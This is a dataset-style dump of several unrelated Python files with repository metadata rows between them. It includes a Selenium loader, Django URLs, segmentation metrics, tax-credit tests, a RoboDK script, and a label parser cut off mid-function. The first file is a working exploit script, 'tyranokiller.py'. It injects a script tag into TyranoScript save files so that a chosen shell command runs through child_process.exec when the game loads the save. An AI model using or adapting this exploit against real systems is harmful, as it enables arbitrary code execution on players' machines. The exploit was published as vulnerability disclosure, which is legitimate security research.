| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af95fa980c5195e3c75aff212645fcf4a36ea392
| 2,532
|
py
|
Python
|
tyranokiller.py
|
satoki/tyranokiller
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | 5
|
2021-12-23T11:23:40.000Z
|
2022-01-01T22:48:18.000Z
|
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
# Exploit Title: TyranoScript 5.13b - Arbitrary Code Execution
# Date: 27/03/2022
# Exploit Author: Satoki
# Vendor Homepage: https://tyrano.jp/
# Software Link: https://github.com/ShikemokuMK/tyranoscript
#
# Version (Save Data ACE):
# TyranoScriptV5 <= 5.04b
# TyranoScript <= 4.83
#
# Version (Development Data ACE):
# TyranoBuilder <= 1.87b
# TyranoBuilderV5 <= 2.03
# TyranoRider <= 2.20
# TyranoStudio <= 1.10d
# (TyranoScriptV5 <= 5.13b)
# (TyranoScript <= 4.88)
#
# Tested on: Windows
# CVE : 0day
#
# GitHub: https://github.com/satoki/tyranoscript_vulnerability
# Usage: python3 tyranokiller.py -c "calc" Test.sav
import os
import sys
import shutil
from argparse import ArgumentParser
argparser = ArgumentParser()
argparser.add_argument("filename", type=str, help="Specify the target sav file name")
argparser.add_argument("-c", "--command", type=str, default="calc", help="Specify the command to be injected")
args = argparser.parse_args()
filename = args.filename
command = args.command
print(f"\033[91m\
-------------------------------------------------------------\n\
| _____ _ _ _ |\n\
| /__ \_ _ _ __ __ _ _ __ ___ /\ /(_) | | ___ _ __ |\n\
| / /\/ | | | '__/ _` | '_ \ / _ \ / //_/ | | |/ _ \ '__| |\n\
| / / | |_| | | | (_| | | | | (_) / __ \| | | | __/ | |\n\
| \/ \__, |_| \__,_|_| |_|\___/\/ \/|_|_|_|\___|_| |\n\
| |___/ |\n\
| v1.1.0|\n\
-------------------------------------------------------------\n\
CVE-XXXX-XXXX\033[0m\n\
Target: {filename}\n\
Command: {command}\n\
------------------------------------------------------------")
if not os.path.isfile(filename):
print("Error: sav file doesn't exist.")
sys.exit(1)
if "\"" in command:
print("Error: Double quotes can't be used in the command.")
sys.exit(1)
shutil.copyfile(filename, f"{filename}.bk")
savfile = open(f"{filename}.bk", mode="r")
data = savfile.read()
savfile.close()
command = command.replace("\\", "\\\\")
code = f"\
alert('Injected_by_TyranoKiller_!!!!');\
require('child_process').exec(`{command}`);\
"
data = data.replace("%3C/div%3E", f"%3C/div%3E%3Cscript%3E{code}%3C/script%3E", 1)
code = code.replace(";", ";\n")
print(f"Code:\n\033[96m{code}\033[0m\
------------------------------------------------------------")
savfile = open(filename, mode="w")
savfile.write(data)
savfile.close()
print("Completed.")
| 30.506024
| 110
| 0.527646
| 265
| 2,532
| 4.754717
| 0.490566
| 0.011111
| 0.011905
| 0.012698
| 0.005556
| 0.005556
| 0
| 0
| 0
| 0
| 0
| 0.035608
| 0.201422
| 2,532
| 82
| 111
| 30.878049
| 0.587537
| 0.236967
| 0
| 0.170213
| 0
| 0.085106
| 0.167715
| 0.036688
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085106
| 0
| 0.085106
| 0.106383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9c8aaccf0095264c9bcfb36a5958fdb4382d26
| 1,322
|
py
|
Python
|
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
__author__='Pruthvi Kumar'
# 30 June 2019.
# pruthvikumar.123@gmail.com
# Load web-page associated with given URL and await given dom element until specified time.
class LoadPage:
def __init__(self, url, dom_id, wait_time=5):
super(LoadPage, self).__init__()
self.url = url
self.dom_id = dom_id
self.wait_time = wait_time
self.driver = webdriver.Chrome()
def extractor(self):
try:
self.driver.get(self.url)
            # Wait as long as required, up to wait_time seconds, for the element to appear
# If successful, retrieves the element
WebDriverWait(self.driver, self.wait_time).until(EC.presence_of_element_located((By.ID, self.dom_id)))
# If you wanted to do any activity like login etc., conduct that here.
return self.driver.page_source
        except TimeoutException:
print("Failed to load page / Failed to wait until {} element was loaded @ "
"{}.".format(self.dom_id, self.url))
finally:
self.driver.quit()
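# Usage sketch (an addition; requires a local ChromeDriver on PATH; the URL
# and dom id below are illustrative assumptions, not part of the original).
if __name__ == "__main__":
    page = LoadPage("https://example.com", "main", wait_time=5)
    html = page.extractor()
    print(html is not None)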
| 33.897436
| 114
| 0.67171
| 178
| 1,322
| 4.842697
| 0.5
| 0.069606
| 0.097448
| 0.064965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011044
| 0.246596
| 1,322
| 38
| 115
| 34.789474
| 0.854418
| 0.229955
| 0
| 0
| 0
| 0
| 0.082097
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.217391
| 0
| 0.391304
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9cf05604e40321edbad3928cd57491f9b1fcff
| 1,598
|
py
|
Python
|
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('bd', views.bdaffair, name="bd_api"),
path('home', views.home_data, name='home_api'),
path('cultural', views.cultural_insights, name='cultural_api'),
path('sports', views.sports_insights, name='sports_api'),
path('international', views.internatioal, name='achievements_api'),
path('interview', views.interviews, name='interview_api'),
path('cc', views.cc, name='cc_api'),
path('youth', views.youth, name='youth_api'),
path('district', views.district_insights, name='district_api'),
path('comics', views.comics, name='comics_api'),
path('trending', views.trending, name='trending_api'),
path('diversed', views.diversed, name='diversed_api'),
path('bd/top', views.bdaffair_top, name="top_bd_api"),
path('home/top', views.home_data_top, name='top_home_api'),
path('cultural/top', views.cultural_insights_top, name='top_cultural_api'),
path('sports/top', views.sports_insights_top, name='top_sports_api'),
path('international/top', views.internatioal_top, name='top_achievements_api'),
path('interview/top', views.interviews_top, name='top_interview_api'),
path('cc/top', views.cc_top, name='top_cc_api'),
path('youth/top', views.youth_top, name='top_youth_api'),
path('district/top', views.district_insights_top, name='top_district_api'),
path('comics/top', views.comics_top, name='top_comics_api'),
path('trending/top', views.trending_top, name='top_trending_api'),
path('diversed/top', views.diversed_top, name='top_diversed_api')
]
| 55.103448
| 83
| 0.71214
| 221
| 1,598
| 4.895928
| 0.126697
| 0.148799
| 0.110906
| 0.049908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112641
| 1,598
| 29
| 84
| 55.103448
| 0.763047
| 0
| 0
| 0
| 0
| 0
| 0.316448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af9ec8c3e054bbb041579522842ad9b2da17d23a
| 11,544
|
py
|
Python
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | 7
|
2021-11-12T05:58:48.000Z
|
2022-02-25T07:05:26.000Z
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pathlib import Path
import itertools
from tqdm import tqdm
from ..utils import get_imageset
import matplotlib.pyplot as plt
import cv2
import json
from ..metrics.surface_dice import metrics as surface_distance
from ..metrics.functional import calc_isolated_fp
def calc_segmentation_metrics(confusion):
tp = np.diag(confusion)
fp = np.sum(confusion, 0) - tp
fn = np.sum(confusion, 1) - tp
tn = np.sum(confusion) - (fp + fn + tp)
iou = calc_iou_from_confusion(tp, fp, fn)
dice = calc_dice_from_confusion(tp, fp, fn)
precision = calc_precision_from_confusion(tp, fp)
recall = calc_recall_from_confusion(tp, fn)
    specificity = calc_specificity_from_confusion(tn, fp)
return {
'iou': iou,
'dice': dice,
'precision': precision,
'recall': recall,
        'specificity': specificity
}
def iou_dice_val(
nb_classes,
dataset,
model,
batch_size
):
confusion = np.zeros((nb_classes, nb_classes), dtype=np.int32)
print('\nvalidation...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion += calc_segmentation_confusion(
output[j], masks[j], nb_classes)
images[:] = 0
masks[:] = 0
return calc_segmentation_metrics(confusion)
def calc_segmentation_confusion(y_pred, y_true, nb_classes):
# Convert predictions and target from categorical to integer format
# y_pred: onehot, y_true: onehot
y_pred = np.argmax(y_pred, axis=-1).ravel()
y_true = np.argmax(y_true, axis=-1).ravel()
x = y_pred + nb_classes * y_true
bincount_2d = np.bincount(
x.astype(np.int32), minlength=nb_classes**2)
assert bincount_2d.size == nb_classes**2
confusion = bincount_2d.reshape((nb_classes, nb_classes))
return confusion
def calc_iou_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
iou = tp / (tp + fp + fn)
iou[np.isnan(iou)] = 0
return [float(i) for i in iou]
def calc_dice_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
dice = 2 * tp / (2 * tp + fp + fn)
dice[np.isnan(dice)] = 0
return [float(d) for d in dice]
def calc_precision_from_confusion(tp, fp):
with np.errstate(divide='ignore', invalid='ignore'):
precision = tp / (tp + fp)
precision[np.isnan(precision)] = 0
return [float(p) for p in precision]
def calc_recall_from_confusion(tp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
recall = tp / (tp + fn)
recall[np.isnan(recall)] = 0
return [float(r) for r in recall]
def calc_specificity_from_confusion(tn, fp):
    with np.errstate(divide='ignore', invalid='ignore'):
        specificity = tn / (fp + tn)
        specificity[np.isnan(specificity)] = 0
    return [float(s) for s in specificity]
def detection_rate_confusions(pred_labels, gt_labels, nb_classes):
"""
gt_labels: iterable container (Width, Height)
prediction_labels: iterable container (Width, Height)
nb_classes: number of classes
"""
    confusion_table = np.zeros((nb_classes, 4), dtype=np.uint8)
    for gt_label, pred_label in zip(gt_labels, pred_labels):
        for class_id in range(nb_classes):
            gt_mask = gt_label == class_id
            pred_mask = pred_label == class_id
            if np.sum(gt_mask) == 0 and np.sum(pred_mask) == 0:
                confusion_table[class_id, 0] += 1
            elif np.sum(gt_mask) == 0 and np.sum(pred_mask) > 0:
                confusion_table[class_id, 1] += 1
            elif np.sum(gt_mask * pred_mask) == 0:
                confusion_table[class_id, 2] += 1
            else:
                confusion_table[class_id, 3] += 1
    return confusion_table
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues,
save_file=None):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.figure()
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('{}.png'.format(save_file))
def calc_surface_dice(pred_out, gt_label, nb_classes, vertical=1.0, horizontal=1.0, tolerance=0.0):
"""
surface dice calculation
Args:
pred_out (np.array, shape (h,w,nb_classes)): prediction output.
gt_mask (np.array, shape (h,w)): ground truth mask.
nb_classes (int): the number of classes
vertical (float, optional): real length (mm) of pixel in the vertical direction. Defaults to 1.0.
horizontal (float, optional): real length (mm) of pixel in the horizontal direction. Defaults to 1.0.
tolerance (float, optional): acceptable tolerance (mm) of boundary. Defaults to 0.0.
Returns:
surface_dice (float):
"""
class_surface_dice = list()
# convert array (value: class_id)
pred_label = np.uint8(np.argmax(pred_out, axis=2))
gt_label = np.uint8(np.argmax(gt_label, axis=2))
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
# convert bool np.array mask
        gt_mask = np.asarray(gt_mask, dtype=bool)
        pred_mask = np.asarray(pred_mask, dtype=bool)
surface_distances = surface_distance.compute_surface_distances(
gt_mask,
pred_mask,
spacing_mm=(vertical, horizontal))
surface_dice = surface_distance.compute_surface_dice_at_tolerance(surface_distances, tolerance_mm=tolerance)
class_surface_dice.append(surface_dice)
return class_surface_dice
def calc_weighted_dice(confusion, isolated_fp, nb_classes, isolated_fp_weights=15.0):
"""
weighted dice calculation
Args:
confusion (np.array): confusion matrix.
isolated_fp (np.array): isolated fp for each class.
isolated_fp_weight (dict or float): isolated fp weights for each class. Defaults to 15.0.
Returns:
weighted_dice (np.array)
"""
if isinstance(isolated_fp_weights, float):
isolated_fp_weights = {i: isolated_fp_weights for i in range(nb_classes)}
assert isinstance(isolated_fp_weights, dict)
sorted_weights = sorted(isolated_fp_weights.items(), key=lambda x: x[0])
isolated_fp_weights = np.asarray([v for _, v in sorted_weights])
tp = np.diag(confusion)
connected_fp = np.sum(confusion, 0) - tp - isolated_fp
fn = np.sum(confusion, 1) - tp
class_w_dice = 2 * tp / (2 * tp + fn + connected_fp + isolated_fp_weights * isolated_fp)
return class_w_dice
def generate_segmentation_result(
nb_classes,
dataset,
model,
save_dir,
batch_size,
sdice_tolerance,
isolated_fp_weights
):
confusion_all = np.zeros((nb_classes, nb_classes), dtype=np.int32)
image_dice_list = list()
dice_list = list()
surface_dice_list = list()
isolated_fp_all = np.zeros(nb_classes, dtype=np.int32)
print('\nsave predicted image...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
batch_index = i // batch_size
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion = calc_segmentation_confusion(
output[j], masks[j], nb_classes)
metrics = calc_segmentation_metrics(confusion)
dice = metrics['dice']
surface_dice = calc_surface_dice(output[j], masks[j], nb_classes, tolerance=sdice_tolerance)
isolated_fp = calc_isolated_fp(output[j], masks[j], nb_classes)
weighted_dice = calc_weighted_dice(
confusion, isolated_fp, nb_classes, isolated_fp_weights=isolated_fp_weights)
result_image = get_imageset(
images[j], output[j], masks[j],
put_text = f'dice: {np.round(dice, 3)} ' \
f'surface dice: {np.round(surface_dice, 3)} ' \
f'weighted dice: {np.round(weighted_dice, 3)}')
data_index = batch_index * batch_size + j
*input_file, _ = dataset.annotations[data_index]
image_path = Path(input_file[0])
save_image_dir = Path(save_dir) / image_path.parent.name
save_image_dir.mkdir(exist_ok=True)
save_image_path = str(save_image_dir / image_path.name)
image_dice_list.append([save_image_path, dice])
dice_list.append(dice)
surface_dice_list.append([save_image_path, surface_dice])
result_image_out = result_image[:, :, ::-1] # RGB => BGR
cv2.imwrite(save_image_path, result_image_out)
confusion_all += confusion
isolated_fp_all += isolated_fp
images[:] = 0
masks[:] = 0
with open(f"{save_dir}/dice.json", "w") as fw:
json.dump(image_dice_list, fw, ensure_ascii=True, indent=4)
with open(f"{save_dir}/surface_dice.json", "w") as fw:
json.dump(surface_dice_list, fw, ensure_ascii=True, indent=4)
dice_class_axis = np.array(dice_list).T.tolist()
for i in range(len(dice_class_axis)):
plt.figure()
plt.hist(dice_class_axis[i])
plt.savefig(f"{save_dir}/dice_hist_class_{i}.png")
metrics = calc_segmentation_metrics(confusion_all)
# append surface_dice and weighted_dice to metrics
mean_surface_dice = np.mean(list(map(lambda x: x[1], surface_dice_list)), axis=0)
metrics['surface_dice'] = [float(x) for x in mean_surface_dice]
metrics['weighted_dice'] = calc_weighted_dice(
confusion_all, isolated_fp_all, nb_classes, isolated_fp_weights=isolated_fp_weights)
return metrics
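# Minimal self-check sketch (an addition, not part of the original module):
# two 2x2 one-hot masks with 2 classes; one pixel differs between prediction
# and ground truth, so the expected confusion matrix is [[1, 0], [1, 2]].
if __name__ == "__main__":
    y_true = np.eye(2)[np.array([[0, 1], [1, 1]])]  # one-hot ground truth
    y_pred = np.eye(2)[np.array([[0, 1], [0, 1]])]  # one pixel mispredicted
    conf = calc_segmentation_confusion(y_pred, y_true, nb_classes=2)
    print(conf)
    print(calc_segmentation_metrics(conf))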
| 34.981818
| 116
| 0.628638
| 1,540
| 11,544
| 4.485065
| 0.166883
| 0.037788
| 0.034458
| 0.014768
| 0.357029
| 0.306645
| 0.241639
| 0.22137
| 0.185609
| 0.164181
| 0
| 0.011258
| 0.261348
| 11,544
| 329
| 117
| 35.088146
| 0.798757
| 0.109061
| 0
| 0.237668
| 0
| 0
| 0.049478
| 0.010743
| 0
| 0
| 0
| 0
| 0.008969
| 1
| 0.058296
| false
| 0
| 0.044843
| 0
| 0.156951
| 0.022422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa04ed205e39049b31fa8fd4108f5232fadca75
| 1,774
|
py
|
Python
|
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
""" Handler for the var action tag. """
# pylint: disable=too-few-public-methods,too-many-arguments,protected-access,unused-argument
__author__ = "Brian Allen Vanderburg II"
__copyright__ = "Copyright 2016-2019"
__license__ = "Apache License 2.0"
from . import ActionHandler, DefaultActionHandler
from ..nodes import Node, NodeList
from ..renderers import StringRenderer
class VarNode(Node):
""" Capture output into a variable. """
def __init__(self, template, line, var):
""" Initialize. """
Node.__init__(self, template, line)
self.var = var
self.nodes = NodeList()
def render(self, state):
""" Render the results and capture into a variable. """
new_renderer = state.push_renderer()
try:
self.nodes.render(state)
contents = new_renderer.get()
state.set_var(self.var[0], contents, self.var[1])
finally:
state.pop_renderer()
class VarActionHandler(ActionHandler):
""" Handle var """
def handle_action_var(self, line, start, end):
""" Handle var """
var = self.parser.get_token_var(start, end, allow_type=True)
start += 1
self.parser.get_no_more_tokens(start, end)
node = VarNode(self.template, line, var)
self.parser.add_node(node)
self.parser.push_nodestack(node.nodes)
self.parser.push_handler(VarSubHandler(self.parser, self.template))
class VarSubHandler(DefaultActionHandler):
""" Handle items under var """
def handle_action_endvar(self, line, start, end):
""" endvar """
self.parser.get_no_more_tokens(start, end)
self.parser.pop_nodestack()
self.parser.pop_handler()
ACTION_HANDLERS = {"var": VarActionHandler}
| 28.612903
| 92
| 0.653326
| 210
| 1,774
| 5.309524
| 0.404762
| 0.080717
| 0.043049
| 0.035874
| 0.059193
| 0.059193
| 0.059193
| 0.059193
| 0
| 0
| 0
| 0.009489
| 0.227734
| 1,774
| 61
| 93
| 29.081967
| 0.80438
| 0.155017
| 0
| 0.058824
| 0
| 0
| 0.044828
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.088235
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa0c7a4dbfb00577736a7f5962a39c917e15a9e
| 1,623
|
py
|
Python
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-11-22T18:15:09.000Z
|
2021-11-22T18:15:09.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 3
|
2021-05-10T18:46:16.000Z
|
2021-06-01T16:51:48.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-05-05T17:20:06.000Z
|
2021-05-05T17:20:06.000Z
|
import pytest
from math import isclose
import sys
sys.path.append('/Users/pyann/Dropbox (CEDIA)/srd/Model')
import srd
from srd import quebec
# I use https://cffp.recherche.usherbrooke.ca/outils-ressources/guide-mesures-fiscales/credit-impot-prolongation-carriere/
# since they don't seem to adjust for taxable income (lines 37 and 38, grille de calcul),
# we add some non-work income to avoid a reduction
@pytest.mark.parametrize('age, amount', [(59, 0), (60, 1500), (64, 1500),
(65, 1650), (70, 1650)])
def test_age(age, amount):
p = srd.Person(age=age, earn=30e3, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1500),
(34610, 1500), (64610, 0), (49610, 750)])
def test_work_inc_63(work_inc, amount):
p = srd.Person(age=63, earn=work_inc, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1650),
(34610, 1650), (67610, 0), ((34610+67610)/2, 825)])
def test_work_inc_66(work_inc, amount):
p = srd.Person(age=66, earn=work_inc, othtax=20e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
| 36.066667
| 123
| 0.637708
| 249
| 1,623
| 4.02008
| 0.413655
| 0.053946
| 0.051948
| 0.047952
| 0.470529
| 0.451548
| 0.451548
| 0.3996
| 0.3996
| 0.3996
| 0
| 0.111373
| 0.214418
| 1,623
| 44
| 124
| 36.886364
| 0.673725
| 0.158349
| 0
| 0.4
| 0
| 0
| 0.066009
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.166667
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa13b4e4fc345a627c690ebb66190bf2e512666
| 1,382
|
py
|
Python
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | 1
|
2019-05-23T14:26:21.000Z
|
2019-05-23T14:26:21.000Z
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
# Type help("robolink") or help("robodk") for more information
# Press F5 to run the script
# Documentation: https://robodk.com/doc/en/RoboDK-API.html
# Reference: https://robodk.com/doc/en/PythonAPI/index.html
# Note: It is not required to keep a copy of this file, your python script is saved with the station
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
RDK = Robolink()
# Get the robot item by name:
robot = RDK.Item('UR3', ITEM_TYPE_ROBOT)
# Get the reference target by name:
R = 100
for i in range(2):
target = RDK.Item('Target %s' % (i+1))
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
# Move the robot to the reference point:
robot.MoveJ(target)
# Draw a hexagon around the reference target:
for i in range(7):
ang = i * 2 * pi / 6 # ang = 0, 60, 120, ..., 360
# Calculate the new position around the reference:
x = xyz_ref[0] + R * cos(ang) # new X coordinate
y = xyz_ref[1] + R * sin(ang) # new Y coordinate
z = xyz_ref[2] # new Z coordinate
target_pose.setPos([x,y,z])
# Move to the new target:
robot.MoveL(target_pose)
# Trigger a program call at the end of the movement
# robot.RunCode('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 32.139535
| 100
| 0.644718
| 218
| 1,382
| 4.036697
| 0.458716
| 0.068182
| 0.061364
| 0.038636
| 0.043182
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021174
| 0.248191
| 1,382
| 42
| 101
| 32.904762
| 0.825794
| 0.560781
| 0
| 0
| 0
| 0
| 0.020513
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa4b7d2595f4e0c541626173ba9e42640a0a707
| 6,471
|
py
|
Python
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 4
|
2020-11-11T07:07:55.000Z
|
2022-02-22T02:39:01.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 2
|
2021-03-17T17:46:56.000Z
|
2021-03-18T08:19:04.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 1
|
2021-10-31T21:00:55.000Z
|
2021-10-31T21:00:55.000Z
|
from PyQt5.QtWidgets import QMainWindow
from ..ekmap_converter import eKConverter
import re
from qgis.core import QgsMessageLog
class LabelParser:
def __init__(self, labeling):
self.labeling = labeling
def _readTextStyle(self, settings):
labelFormat = settings.format()
field = settings.fieldName
finds = re.findall(r"\((.*?)\)", field)
if (len(finds) == 1):
field = finds[0]
xOffset = float(settings.xOffset)
yOffset = float(settings.yOffset)
offsetUnit = settings.offsetUnits
xOffset = eKConverter.convertUnitToPixel(value=xOffset, unit=offsetUnit)
